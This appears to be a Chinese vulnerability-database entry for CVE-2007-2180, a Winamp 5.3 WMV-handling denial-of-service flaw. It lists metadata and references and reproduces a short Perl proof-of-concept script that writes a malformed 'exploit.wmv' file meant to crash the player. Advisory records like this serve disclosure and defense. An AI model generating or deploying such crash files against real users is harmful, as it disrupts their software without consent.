Nullsoft Winamp WMV文件处理拒绝服务漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1112743 漏洞类型 缓冲区溢出
发布时间 2007-04-19 更新时间 2007-04-25
CVE编号 CVE-2007-2180 CNNVD-ID CNNVD-200704-438
漏洞平台 Windows CVSS评分 7.1
|漏洞来源
https://www.exploit-db.com/exploits/3768
https://cxsecurity.com/issue/WLB-2007040108
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200704-438
|漏洞详情
Winamp是一款流行的媒体播放器,支持多种文件格式。Winamp处理畸形WMP文件时存在漏洞,如果Winamp用户受骗打开了恶意的WMV文件的话,就会导致播放器崩溃。
|漏洞EXP
#!/usr/bin/perl

# --------------------------------- Winamp <= (WMV) 5.3 Buffer Overflow DOS Exploit (0-DAY) ---------------------------------

# Type :

# Buffer Overflow - DOS

# Release Date :

# {2007-04-16}

# Product / Vendor :

# Winamp Media Player

# http://www.winamp.com/

# Exploit :

#############################################
#Exploit Coded By UNIQUE-KEY[UNIQUE-CRACKER]#
#############################################

{

    print "\n-----------------------------------\n";

    print "Winamp <= (WMV) 5.3 Buffer Overflow DOS Exploit (0-DAY)\n";

    print "-----------------------------------\n";

    print "\nUniquE-Key{UniquE-Cracker}\n";

    print "UniquE[at]UniquE-Key.ORG\n";

    print "http://UniquE-Key.ORG\n";

    print "\n-----------------------------------\n";

    print "\nExploit Completed!\n";

    print "\n-----------------------------------\n";

}

open(wmv, ">./exploit.wmv");

print wmv "\x00\x00\x00\x06\x00\x00\x00\x00\x00\x00".

print wmv "\x4D\x54\x68\x64";

close(wmv);

# Tested :

# --- WINAMP 5.3 Version ---

# Author :

# UniquE-Key{UniquE-Cracker}
# UniquE(at)UniquE-Key.Org
# http://www.UniquE-Key.Org

# milw0rm.com [2007-04-19]
|参考资料

来源:BID
名称:23568
链接:http://www.securityfocus.com/bid/23568
来源:BUGTRAQ
名称:20070419Winamp<=(WMV)5.3BufferOverflowDOSExploit(0-DAY)
链接:http://www.securityfocus.com/archive/1/archive/1/466291/100/0/threaded
来源:XF
名称:winamp-wmv-bo(33764)
链接:http://xforce.iss.net/xforce/xfdb/33764
来源:MILW0RM
名称:3768
链接:http://www.milw0rm.com/exploits/3768
来源:SREASON
名称:2601
链接:http://securityreason.com/securityalert/2601